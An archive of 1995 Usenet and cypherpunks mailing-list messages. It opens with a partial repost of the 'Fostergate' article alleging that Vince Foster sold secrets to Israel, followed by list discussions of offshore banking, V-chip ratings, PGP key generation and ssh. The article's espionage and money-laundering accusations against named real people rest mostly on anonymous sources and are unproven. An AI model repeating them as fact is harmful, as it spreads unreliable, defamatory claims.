From: QDQD56A@prodigy.com (Ct Buskuhl)
Newsgroups: alt.current-events.clinton.whitewater
Subject: Fostergate Reprint
Date: 31 Jul 1995 05:40:06 GMT

James Norman is the Senior Editor for the highly respected FORBES 
magazine. Several months ago, he wrote an article about the death of 
Vince Foster, called "Fostergate." 

  This article was set to run and was pulled at the last minute by forces 
that are unknown at this time. You may recall a similar situation with 
the Washington Post spiking the Mena story at the last minute - despite 
their own lawyers clearing it to run. The Mena story ended up in this 
month's Penthouse magazine of all places. Fortunately Mr. Norman's 
article found a more respectable home - at Media Bypass!
  Media Bypass will feature this article in their August issue. I 
certainly owe them a little plug for posting this in advance. You may 
subscribe to it by calling 1-800-4-BYPASS. 
  The article is as follows:

FOSTERGATE
by James R. Norman

"Was White House Deputy Counsel Vince Foster selling US secrets to Israel?
 The CIA suspects he was."

  TWO weeks before his death on July 20, 1993, White House Deputy Counsel 
Vincent W. Foster went into a deep funk. The official cause of death, 
given by former Independent Counsel Robert Fiske Jr. (who was later 
replaced by Kenneth Starr), was suicide driven by depression over, among 
other things, several newspaper editorials. But Vince Foster had a much 
bigger and darker reason to be seriously burned out. He had just learned 
he was under investigation for espionage.
  Outrageous? To say the least. But a lengthy investigation has located 
over a dozen sources with connections to the intelligence community who 
confirm a shocking story of money laundering and espionage connected to 
the highest levels of the White House. Without grants of immunity, the 
sources risk going to prison for violation of the National Security Act. 
Virtually all have demanded anonymity.
  According to a veteran Central Intelligence Agency operative close to 
the Foster investigation, Foster's first indication of trouble came when 
he inquired about his coded bank account at Banca Della Svizzera Italiana 
in Chiasso, Switzerland and found the account empty. Foster was shocked 
to learn from the bank that someone using his secret authorization code 
had withdrawn all $2.73 million he had stashed there and had moved it to, 
of all places, the U.S. Treasury.
  Then, according to credit card records reviewed by a private 
investigator who has revealed them, Foster canceled the two-day round-
trip TWA and Swiss Air plane tickets to Geneva he had purchased on his 
American Express card through the White House travel office on July 1. 
  Discretely he began asking what was afoot, says the CIA source, 
confirming that someone in the White House tipped him off. It was bad 
news. The CIA had Foster under serious investigation for leaking high-
security secrets to the State of Israel.
  For months, a small cadre of CIA computer hackers known as the Fifth 
Column, armed with a Cray supercomputer, had been monitoring Foster's 
Swiss account. They had located it by tracking money flows from various 
Israeli government accounts after finding Foster's name while secretly 
snooping through the electronic files of Israel's Mossad. Then by 
snooping through the bank files, they gathered all the information needed 
to withdraw the money. 
  Foster was just one of the first of scores of high level U.S. political 
figures to thus have their secret Swiss accounts looted of illicit funds, 
according to both this veteran CIA source and a separate source in 
another intelligence agency. Over the past two years, they say, more than 
$2 billion has been swept out of offshore bank accounts belonging to 
figures connected to the U.S. government with nary a peep from the 
victims or their banks. The claim that Foster and other U.S. figures have 
had offshore accounts has been confirmed by a separate high-ranking CIA 
source and another in the Department of Justice. 
  Various sources, some of them controversial, have contributed other 
pieces to this puzzle. Whatever their motivations, those sources have 
proven remarkably consistent. Their stories jibe well with known facts 
and offer a most plausible explanation for Foster's mysterious depression.
 It would also explain Washington's determined effort to dismiss the 
Foster affair as a tragic but simple suicide.
  Vince Foster a spy? Actually, it is much worse than that, if the CIA's 
suspicions are confirmed by the ongoing foreign counterintelligence probe.
 He would have been an invaluable double agent with potential access to 
not only high-level political information, but also to sensitive code, 
encryption and data transmission secrets, the stuff by which modern war 
is won or lost. That is because for many years, according to nine 
separate current and former U.S. law enforcement or intelligence 
officials, Foster had been a behind-the-scenes manager of a key support 
company in one of the biggest, most secretive spy efforts on record, the 
silent surveillance of banking transactions both here and abroad.
  This bank snooping effort began in earnest soon after Ronald Reagan 
became president in 1981. Its primary aim was to track the money behind 
international terrorist groups and soon came to be dubbed, "Follow the 
money", according to the originator of the program Norman A. Bailey. Now 
a private Washington consultant on international banking, Bailey was an 
economist and Reagan advisor on the National Security Counsel. It was 
Bailey's idea to begin using powerful new computer and electronic 
eavesdropping technologies then emerging to let the intelligence 
community monitor the previously confidential flow of bank wire transfers.
 This was no small task; more than $1 trillion a day moves through New 
York alone.
  Bailey, himself constrained by the National Security Act, claims he 
doesn't know exactly how the data was collected. But he confirms that 
within a few years (of 1981) The National Security Agency (NSA), the 
signals intelligence arm of the government, had begun vacuuming up 
mountains of data by listening in on bank wire traffic. It became a joint 
effort of several Western governments with the Israelis playing a leading 
role, since they were the main targets of terrorism.
  Other intelligence experts say the flow of bits and bytes was captured 
by various means; from simply tapping phone lines to implanting 
customized chips in bank computers to store up and periodically "burst-
transmit" data to a passing van, or low-flying "sig-int" or signals 
intelligence satellite. Another part of the problem was to get the 
world's banks to standardize their data so that it could be easily 
analyzed. And that brings up to PROMIS, a powerful tracking tracking 
software developed for the U.S. Government and then further enhanced by a 
little company called Inslaw Inc.
  PROMIS stands for Prosecutor's Management Information Systems and was 
designed to manage legal cases. In 1982, just as Bailey's follow-the-
money effort was gaining steam, the Reagan Justice Department eagerly 
snapped up Inslaw's newest version of PROMIS. But the government refused 
to pay the $6 million owed for it, claiming part of the contract was not 
fulfilled. Inslaw, forced into Chapter 11 reorganization, and nearly 
driven to quick liquidation by the government and its former partner AT&T,
 hotly denied that claim. Ultimately, a bankruptcy judge ruled the 
government stole the PROMIS software by "trickery, fraud and deceit."
  Why PROMIS? Because it was adaptable. Besides tracking legal cases, it 
could be easily customized to track anything from computer chip design to 
complex monetary transactions. It was especially useful for tracking 
criminals or just plain political dissidents. Inslaw claims the software 
was eventually illegally sold to as many as 50 countries for use by their 
police, military or intelligence agencies, including such bloody regimes 
as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). 
Profits on these sales, Inslaw claims, went mainly into the private 
pockets of Republican political cronies in the 1980s, including Reagan 
confident Barl Brain, former part-owner of UPI and FNN.
  Among the biggest profiteers on PROMIS, according to the 1992 book by 
former Israeli anti-terrorism staffer Ari Ben-Menaseche, was former 
British publisher Bob Maxwell. On behalf of the Israelis, Maxwell 
aggressively marketed a doctored version of PROMIS equipped with one or 
more "back doors" to allow an outsider to tap into the user's data base 
without leaving an audit trail. In fact, it may have been such rigged 
programs that allowed noted Israeli spy Jonathon Pollard, from his 
computer terminal at the Office of Naval Intelligence in Washington, to 
download vast amounts of top secret U.S. nuclear weapons and code data in 
the mid-1980s.
  According to a heavily-redacted New Mexico FBI counterintelligence 
report, Maxwell was apparently allowed to sell two copies of PROMIS back 
to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims 
was a hugely inflated price of $87 million. That would have allowed 
Pollard, if he was using the rigged program, to obtain U.S. missile 
targeting data long before Israel had its own satellite capability, thus 
making it a real nuclear threat to the Soviet Union. Pollard was 
convicted of espionage and sentenced in 1986 to life imprisonment. U.S. 
officials have vehemently opposed efforts to gain his early release.
  Maxwell, according to Ben-Menaseche and nine other sources, was also 
selling pirated versions of PROMIS to major world banks for use in their 
wire transfer rooms to track the blizzard of numbers, authorization codes 
and confirmations required on each wire transaction. Don't expect any 
banks to admit running PROMIS software. They probably now know it was 
pilfered. But they readily took it both because it was the best tracking 
software available at the time and because the U.S. government was 
tacitly leaning on them to go along with the surveillance effort or face 
regulatory reprisals or prosecution on money laundering charges. With the 
widespread adoption of PROMIS, the data became standardized and much 
easier to analyze by the NSA.
  It took some effort to install and support PROMIS in the banking 
industry. That's where Vince Foster came in. Sources say that since at 
least the late 1970s, Foster had been a silent, behind-the-scenes 
overseer on behalf of the NSA for a small Little Rock, Ark., bank data 
processing company. Its name was Systematics Inc., launched in 1967 and 
funded and controlled for most of its life by Arkansas billionaire 
Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. 
Foster was one of Stephens' trusted deal makers at the Rose Law Firm, 
where he was partner with Hillary Rodham Clinton, Webster Hubbell and 
William Kennedy (whose father was a Systematics director). Hubbell also 
played an overseer role at Systematics for the NSA for some years 
according to intelligence sources.
  Systematics has had close ties to the NSA and CIA ever since its 
founding, sources say, as a money-shuffler for covert operations. It is 
no secret that there were billions of dollars moving around in "black" 
accounts - from buying and selling arms to the Contras, Iran, Iraq, 
Angola, and other countries to paying CIA operatives and laundering money 
from clandestine CIA drug dealing (such as at Mena, Arkansas). Having 
taken over the computer rooms in scores of small U.S. banks as an "out-
sourced" supplier of data processing, Systematics was in a unique 
position to manage that covert money flow. Sources say the money was 
moved at the end of every day disguised as a routine bank-to-bank 
balancing transaction, out of view of bank regulators and even the banks 
themselves. In short, it became cyber-money.
  One man who uncovered the link between Systematics, Foster and covert 
money movements from arms and drugs was Bob Bickel, who was an undercover 
Customs investigator in the 1980s. "We found Systematics was often a 
conduit for the funds" in arms and drug transactions, says Bickel, now 
living in Texas: "They were the money changers." His story is 
corroborated by a former CIA employee who says it was well known within 
the agency in the late 1970s that Foster was involved with Systematics in 
covert money management.
  Another source is Michael Ricoposciuto, former research director of the 
covert arms operation at California's tiny Cabazon Indian Reservation in 
the early 1980s. Ricoposciuto claims his crew of computer programmers 
helped customize PROMIS there for banking and other uses. He is now 
serving 80 years in a South Carolina federal prison ostensibly on drug 
charges. Though maybe not a credible source on his own, his story fits 
well with other sources.
  Systematics' money-laundering role for the intelligence community might 
help explain why Jackson Stephens tried to take over Washington-based 
Financial General Bankshares in 1978 on behalf of Arab backers of the 
Bank of Credit and Commerce International (BCCI). BCCI's links to global 
corruption and intelligence operations has been well documented, though 
many mysteries remain.
  According to a lawsuit filed by the Securities and Exchange Commission, 
Stephens insisted on having then-tiny Systematics brought in to take over 
all of FGB's data processing. Representing Systematics in that 1978 SEC 
case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in 
that takeover. But FGB, later renamed First American, ultimately fell 
under the alleged domination of BCCI through Robert Altman and former 
Defense Secretary Clark Clifford. According to a technician who worked 
for First American in Atlanta, Systematics became a key computer 
contractor there anyway.
  In the 1980s, Systematics' business boomed. When it first sold stock to 
the public in 1983, revenues were $64 million. That had risen to $230 
million by the time Stephens arranged Systematics' sale to Alltel Corp., 
a telephone holding company which then moved its headquarters to Little 
Rock. Last year, Systematics sales hit $861 million - a third of Alltel's 
total. Stephens now owns more than 8 percent of Alltel and wields 
significant influence over the company.
  When Bill Clinton was elected president in 1992, bringing Foster, 
Hubbell and Kennedy to the White House staff, Systematics' foreign bank 
business flourished. It began to announce a flood of data processing 
deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, 
Trinidad and elsewhere. According to veteran bank software vendors, and 
computer intelligence specialist Wayne Madsen, co-author of a book about 
the NSA called "The Puzzle Palace", it is inconceivable any U.S. company 
could land such lucrative work without the intimate participation of the 
NSA. Domestic business took off as well, with giants like Citibank and 
Nations Bank signing big data processing deals.
  Working alongside Systematics in this spooky world of bank computer 
spying appears to be a cluster of other curious, loosely-affiliated 
companies. For instance, there is Boston Systematics, headed by former 
CIA officer Harry Wechsler, who controls two Israeli companies that also 
use the name Systematics. Wechsler denies any connection to the Arkansas 
company (now named Alltel Information Services) and claims to know 
nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 
1987 from Wechter's Israeli company seeking marketing data on PROMIS.
  Many of the intelligence sources who provided information for this 
story insist that Boston Systematics and the Arkansas company are, in 
fact, related in some way. And based on his own source in the Justice 
Department, Inslaw's founder William A. Hamilton says he believes Boston 
Systematics was also closely linked with both Maxwell and Rafl Bitan, the 
former head of Israel's anti-terrorism effort. Hamilton says Bitan, using 
a false name, showed up at Inslaw's Washington, DC office one day in 1983 
for a private demonstration of PROMIS.
  Another curious company is Arkansas Systems, founded in 1974 by 
Systematics employee and formerly U.S. Army "analyst" John Chamberlain, 
located just down the road from Systematics. Arkansas Systems specializes 
in computer systems for foreign wire transfer centers and central banks. 
Among its clients: Russia and China, according to Arkansas Systems 
president James K. Hendren, a physicist formerly involved with the 
Safeguard anti-missile system. Arkansas Systems was one of the first 
companies to receive funding from the Arkansas Development Finance 
Authority (ADFA), an agency created by Bill Clinton that is now coming 
under Congressional scrutiny.
  What does Alltel have to say about all of this? "I've never heard 
anything so asinine in all my life," steams Joe T. Ford, Alltel's 
chairman and the father of Jack Stephen's chief administrative aide.
  John Stouri, a former IBM executive who is chief executive of Alltel 
Information Services, says he had never heard of Boston Systematics 
before this inquiry. He declares that the Arkansas company does almost no 
work for the government, scoffs at the idea his company is tied to the 
NSA and says Foster has never had any connection to Systematics. As for 
the fact he sold half his 700,000 Alltel shares in February at $34, just 
before it began skidding to under $24, he says that was merely to pay for 
the exercise of options.
  Why is it then that Hamilton claims sources in two separate 
intelligence agencies say documents relating to Systematics were among 
those taken from Foster's office immediately after Foster's death? Indeed,
 a private investigator close to the continuing "Whitewater" probe by 
Independent Counsel Kenneth W. Starr says he has learned that Hubbell has 
delivered those documents - including papers related to Systematics - to 
Starr. Hubbell pleaded guilty last December to two felony counts related 
to over-billing at the Rose Law Firm and has been sentenced to 21 months 
in prison.
  If Foster knew the U.S. was spying on foreign banks, why would he let 
himself be caught red-handed with a Swiss bank account? The answer may be 
that the Israeli transactions were, in fact, well concealed, according to 
the veteran CIA source. And Foster would have known that, unless a prober 
knew exactly what to look for, finding his payoffs in the torrent of 
routine wire transfer data would be a hopeless task. Besides that, greed 
could explain a lot, if not Foster's then for whomever else he might have 
been playing bagman. The CIA source says Foster was not the only one in 
the White House under suspicion for peddling state secrets.
  All of which helps explain Foster's odd behavior before his death. He 
was a tough, smart trial attorney at the peak of power in Washington. 
Only 48 years old, he was in excellent health. Suddenly, according to the 
Fiske report, he couldn't sleep. He complained of heart palpitations and 
high blood pressure. His sister arranged for him to see a Washington 
psychiatrist, who later told the FBI he had been instructed not to take 
notes because Foster's depression was "directly related to highly 
sensitive and confidential matters" tied to his "top secret" government 
work.
  Foster never saw a shrink. Instead, about a week before he died, he 
hired a lawyer: high-powered DC criminal attorney and political fix-it 
man James Hamilton. Foster's wife claims his reason was the White House 
Travel Office controversy, which was expected to lead to congressional 
hearings.
  On the weekend of July 17 and 18, Foster drove with his wife to the 
eastern shore of Maryland to relax. By "coincidence", according to the 
Fiske report, so did Hubbell. They met at the posh estate of Michael 
Cardozo, head of Clinton's legal defense fund and son-in-law of prominent 
Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend 
was a laid-back gathering of tennis and poolside chit-chat.
  But according to sources connected to the CIA, Justice Department and 
another intelligence agency, the meeting was under surveillance. The 
agenda? Heavy duty damage control. Foster was grilled. To whom else could 
the Swiss money be traced? How could the scandal be contained?


Sorry. File too long. Maybe someone else can post rest. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 31 Jul 95 08:15:45 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
Message-ID: <Pine.SUN.3.91.950731100140.4105A-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Enzo Michelangeli wrote:

> On Sun, 30 Jul 1995, Mike Bailey wrote:
> 
> > > The US banking industry has gone to the dogs. The day a non-US bank offers
> > > an account that can be accessed over the net will be the day I close my US
> > > accounts.
> > 
> > Interesting idea ...
> > 
> > 1st question or thing I would want to be certain of is the stability of the
> > currency of the realm so to speak. I wouldn't want to bank in a country that
> > had a weak currencey (sp) or was subject to roller coaster economics.  
> 
> How could it be worse than with the U.S. of A.?? ;-)
> 
> Seriously: you may bank in US Dollars (or other major currencies) in many
> countries, including all the offshore banking centres. Limited amounts of
> cash may be withdrawn using ATM dispensers, against a fee of two or three
> USD per operation; for larger amounts, you may ask them to wire money by
> SWIFT, Telex or bank drafts to other banks or genric payees. For such
> operations, most large banks accept instructions by snail mail, and
> sometimes by fax (if the customer signs a letter of indemnity exempting
> the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is
> accepting digitally encrypted and signed e-mail instructions, and issuing 
> digitally encrypted and signed receipts.
> 
I'm feel that this type of banking is just around the corner with the coming
tidal wave of internet based commerce.

My primary concern would be something along this senario ... 

I open an account with U.S. $$ in a foreign bank who uses francs (don't
flame the denonimation or the choice this is just an exammple ;-) ... a month 
later the franc loses 20 % of it's value as compared to the U.S. dollar. If I 
close out my account would I not lose 20% of my money because when the money was 
deposited it was credited to the account in francs ... and when it is withdrawn 
it converted back to $$ at the current conversion rate ? Maybe this was answered 
in the previous reply if so call me *thick* if not call me *paranoid*.

-Mike

**************************************************************************
*   Personal internet account, opinions and ideas do not reflect those   *
*                         of my employer                                 *
*       Mike Bailey                     (hm)214-252-3915                 * 
*       email bailey@computek.net       (wk)214-456-4510                 *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 10:15:52 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <ac425d4208021004ef6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Wow! I think Ted just hit on something that could be used to quickly derail
the "V-chip":

At 4:02 PM 7/31/95, Thaddeus J. Beier wrote:

>The chip that interprets the content does it solely based on the rating
>information.  This is the so-called "v-chip" (v for violence, I think,
>not for video) that you see in the press.
...
>qualifications of most people.  Besides, what I would really
>like to filter out, what I find to be incredibly violent to the
>minds of children, is commercial advertising.  Private rating
>services could take care of these, easily, as well.

I agree, of course, about it not being the role of government/FCC/etc. to
mandate such ratings, such chips, etc.

However, to help derail this V-chip being mandated, what if we (I mean
activists, writers of columns, etc.) "insisted" that _commercials_ be
similarly labelled?

"Yes, if violence and sex is to be "voluntarily rated," we think that
commercial advertising ought to be similarly rated."

It might be hard for the legislators to avoid the logic of this.
Advertisers, fearing people would of course mute the commercials, would
then quietly urge them to drop the whole idea.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 07:43:38 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: your mail
In-Reply-To: <Pine.SOL.3.91.950731132625.27376C-100000@eagle.nexor.co.uk>
Message-ID: <9507311434.AA25514@all.net>
MIME-Version: 1.0
Content-Type: text


> As I'm sure you know, PGP picks its primes by choosing a random starting 
> point and testing each odd number upwards until it gets a probable 
> prime.  The random number generator used to seed this search is mixed 
> using MD5 which gives a uniform 1/0 distribution.  I'd hazard a guess 
> that the chances of a start point having so many contiguous 1's as to be 
> close to 2^N is so vanishingly small that it's more likely a 
> non-prime would pass the probabalistic tests!

Well, not exactly random starting points.  Starting points generated by
user keystrokes with characteristics that may be analyzed so as to
reduce the key space to a searchable size, starting points that are
determined by a transformation of those keystroke sequences using an
algorithm, starting points that are determined by an algorithm that uses
a deterministic (albeit complex) algorithm which performs input and
output based on timeslices and interrupt mechanisms and queues that may
tend to alter the statistics of arrival times.

> I suppose if I were really paranoid I'd feed in fixed starting points
> for the search to MIT PGP and PGP 2.6.2 to make sure that they come out 
> with the same keys.

The term paranoid is inappropriate in this context.  Paranoia refers to
an irrational fear, while I am expressing a rational concern over a
system that has been taken over by a (partially) government funded
university and which has not been properly verified.  The history of
cryptography (as they say) is (quite literally) littered with the dead
bodies of people killed because somebody else thought a cryptosystem was
good enough when it was not. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sun, 30 Jul 95 21:11:06 PDT
To: Mike Bailey <bailey@computek.net>
Subject: Re: Zimmermann legal fund
In-Reply-To: <Pine.SUN.3.91.950730213249.3889C-100000@bambam>
Message-ID: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Mike Bailey wrote:

> > The US banking industry has gone to the dogs. The day a non-US bank offers
> > an account that can be accessed over the net will be the day I close my US
> > accounts.
> 
> Interesting idea ...
> 
> 1st question or thing I would want to be certain of is the stability of the
> currency of the realm so to speak. I wouldn't want to bank in a country that
> had a weak currencey (sp) or was subject to roller coaster economics.  

How could it be worse than with the U.S. of A.?? ;-)

Seriously: you may bank in US Dollars (or other major currencies) in many
countries, including all the offshore banking centres. Limited amounts of
cash may be withdrawn using ATM dispensers, against a fee of two or three
USD per operation; for larger amounts, you may ask them to wire money by
SWIFT, Telex or bank drafts to other banks or genric payees. For such
operations, most large banks accept instructions by snail mail, and
sometimes by fax (if the customer signs a letter of indemnity exempting
the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is
accepting digitally encrypted and signed e-mail instructions, and issuing 
digitally encrypted and signed receipts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 12:15:03 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <ac4278780e0210045406@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:13 PM 7/31/95, Robert Hettinga wrote:
>I could agree to a private filtering mechanism where each program
>broadcasts an ID number.
>
>A chip on the set reads this info from the dark band between frames or
>someplace.
>
>Private agencies rate the programs by whatever criteria sells ("Bikinis &
>Beer", "Motherhood and Apple Pie", whatever), and people load those
>rating/show lookups into their set off of the net or wherever...
>
>Certainly the government shouldn't reqire anything. The government couldn't
>find its ass with both hands. I bet this scheme could sell on an
>information value-added basis alone.

The "VCR-Plus" codes that are already published essentially offer this code
already. Thus, one looks in the channel lisings and finds "Debbie Does Fort
Meade" has a VCR-Plus code of "31415926," which one enters to set recording
times, etc. (This even has some low-level crypto content, as the VCRPlus
coding system was a topic of much debate a couple of years ago.)

True, this takes work. (Though some satellite systems offer it via a
point-and-click interface, on the actual t.v. screen.)

The key difference between this setup and the "in band" proposal RAH is
making is that VCR-Plus is "out of band." But the point is that the info is
there in both cases.

The infrastructure for using this to block stuff doesn't exist in most
t.v.s or VCRs, but then it wouldn't exist either with RAH's in-band program
labelling approach (which I expect is coming anyway--my cable system
reports on what network it's seeing, even as the networks alter lineups,
and reports time, system status, etc....all presumably in the 4-line
interval, etc.)

What's really flawed about these "lockout" schemes is that the installed
base of televisions and VCRs is NOT going to go away, that no magic wand is
going to give a single mother who wants to control what her children watch
a new t.v. or VCR. As some non-stupid Senators noted, the V-chip system
will go into the households who need it the _least_!

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Mon, 31 Jul 95 09:48:28 PDT
To: "James A. Donald" <aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <9507311625.AB06469@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:24 PM 7/30/95 -0700, James A. Donald wrote:
>If you insist that international transactions be mediated through 
>US banks, you are cutting your throat.

I hope my mail didn't give the impression that we are "insisting" on this. 
It's a matter of technical expedience at the moment, that's all.  Non-US
sellers who really want to use FV can do so today IF they get a US bank
account.  Payout through non-US banks is definitely something we plan to
do, but you can't build a business today on our plans for tomorrow,
especially since we don't have a firm target date.

One of the relatively easiest alternatives we have discussed is good old
fashioned paper checks.  We could *conceivably* (this is not a promise!)
set up a system to pay non-US sellers by mailing them paper checks.  This
is a fairly expensive process, and we'd have to pass on the costs to the
sellers in the form of a service charge for the mailing, and there would be
postal delays, and there would be a delay waiting for your local bank to
clear a US check.  Is this appealing?  -- Nathaniel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 31 Jul 95 09:47:51 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Ivy Bells, Smersh, and the Rosenbergs
In-Reply-To: <ac424ae9050210049fd9@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950731123935.6771A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Timothy C. May wrote:

> On the other issue, whether either or both of the Rosenbergs were spies,
> things have settled yet. Sudoplatov, in "Special Tasks," claims they were
> both spies. Others doubt it.
> 
> (For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to
> spies." Yes, it really existed, unlike, say "U.N.C.L.E.")
> 
> On the issue of whether in the 1950s the U.S. government knew the
> Rosenbergs were spies, we have even less information. A trial was held and
> guilty verdict returned, but reasonable folks may disagree. My guess? Yes,
> they were probably spies.

Hmm... the stuff that was from the "one-time pads" that were recently 
decrypted says it was fairly certain they were.  So says Kahn. :)

I'm not convinced that there was enough public information available for 
a reasonable conviction back in the 50's, but there seems to be now.

> The Rosenbergs were certainly the Mumia Abu Jamals of their day.

The Mumia case (something friends of mine are more than peripherally 
acquainted with) seems to be very much in doubt.  Of course, they'll kill 
him anyway, probably.  But I suggest reading E.L. Doctrow's essay on the 
subject from the NYT of several weeks (months? possibly) back.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 31 Jul 95 11:28:04 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507311827.NAA25455@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>The idea of boxes outside the TV is usually casually shot down
>as unworkable; that kids, with their infinite time, patience,
>cleverness, and guile, will find a way to bypass the box.
>I'd say that it's worth a try.  And, if it will blank
[...]

I hadn't thought of that before.  I wonder how many kids will get
zapped trying to bypass the chip on the inside.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Mon, 31 Jul 95 13:36:58 PDT
To: cypherpunks@toad.com
Subject: Re: ssh protocol
In-Reply-To: <199507310737.JAA06792@cnam.fr>
Message-ID: <9507312036.AA08394@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tatu Ylonen <ylo@cs.hut.fi> wrote:
> The basic idea behind the protocol goes roughly like this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange (the
>      signature can be with any of a number of algorithms; RSA and
>      Elliptic Curve systems have been defined).

I've been playing with the cryptotcp program available from utopia..  It
has some bugs but works pretty well, if you don't mind waiting 20-30
seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
telnet.  How hard would it be to add some sort of authentication to this
program?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Mon, 31 Jul 95 05:38:45 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: your mail
In-Reply-To: <9507311116.AA13350@all.net>
Message-ID: <Pine.SOL.3.91.950731132625.27376C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> I wrote:
>> On Fri, 28 Jul 1995, Dr. Frederick B. Cohen wrote:
>> 
>>> How (specifically) do you know that this is true?  Key generation is
>>> very tricky stuf, and very subtle changes can have very profound impacts.
>>> I doubt that Zimmerman's original was truly perfect at this either, but
>>> how do we really know?
>> 
>> Because I've succesfully run the primes that PGP generates through the
>> primality tests in other mathematical packages, most notably Arjen
>> Lenstra's FreeLIP package.  The remaining steps to generating an RSA
>> keypair are very easy to follow, and the result simple to check by
>> verifying that the components PGP comes up with satisfy
>> ed=1 mod(p-1)(q-1).  rsagen.c is pretty easy to follow if anyone wants to 
>> check for themselves.
> 
> But that doesn't guarantee there aren't weak keys at all.  For example,
> primes of the sort 2^N+1 would pass the primality tests and be very
> weak keys.

As I'm sure you know, PGP picks its primes by choosing a random starting 
point and testing each odd number upwards until it gets a probable 
prime.  The random number generator used to seed this search is mixed 
using MD5 which gives a uniform 1/0 distribution.  I'd hazard a guess 
that the chances of a start point having so many contiguous 1's as to be 
close to 2^N is so vanishingly small that it's more likely a 
non-prime would pass the probabalistic tests!

I suppose if I were really paranoid I'd feed in fixed starting points
for the search to MIT PGP and PGP 2.6.2 to make sure that they come out 
with the same keys.


- - Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMBzOMCXfPV+WEQVdAQEs3Af/Qr1RSfgKw0lHSdo+3A59ZY/7cmw1voA3
6zrl1uAOxUfXVO36UPrSh5/lGHjGNW25FU4mckZ5qwhD9x8BEI3NemIddAtSrnbH
